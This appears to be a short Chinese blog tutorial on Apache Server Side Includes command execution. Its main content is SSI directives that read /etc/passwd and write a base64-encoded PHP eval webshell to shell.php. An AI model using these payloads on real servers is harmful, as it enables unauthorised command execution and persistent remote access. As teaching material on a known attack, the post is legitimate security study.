Apache SSI 远程命令执行漏洞

SSI（服务器端包含）是放置在HTML页面中的指令，并在服务页面时在服务器上对其进行评估。它们使您可以将动态生成的内容添加到现有的HTML页面，而不必通过CGI程序或其他动态技术来提供整个页面。

例如，您可以将指令放置到现有的HTML页面中，例如：

 <!--#echo var="DATE_LOCAL" -->

并且，当该页面被投放时，该片段将被评估并替换为其值：

 Tuesday, 15-Jan-2013 19:28:54 EST

 读取etc/password
 <!--#exec cmd="cat /etc/passwd" -->

也可以写入一句话木马

 <!--*#exec cmd="echo PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4=|base64 -d> shell.php"-->*

posted @ 2022-10-27 11:14 GTL_JU 阅读(45) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· ssti模板注入基础

· 日志文件包含漏洞

· Apache SSI远程命令执行漏洞

· Apache SSI 远程命令执行漏洞漏洞复现

· SSI(Server Side Includes)的利用

阅读排行：
· 阿里最新开源QwQ-32B，效果媲美deepseek-r1满血版，部署成本又又又降低了！
· SQL Server 2025 AI相关能力初探
· 单线程的Redis速度为什么快？
· AI编程工具终极对决：字节Trae VS Cursor，谁才是开发者新宠？
· 开源Multi-agent AI智能体框架aevatar.ai，欢迎大家贡献代码

+加关注

昵称： GTL_JU
园龄： 2年11个月
粉丝： 3
关注： 1

GTL—JU

没有过人的天赋，没有超人的运气，只有一如既往的坚持，没有原因，只是热爱。

2025年3月

日

一

二

三

四

五

六

JU的博客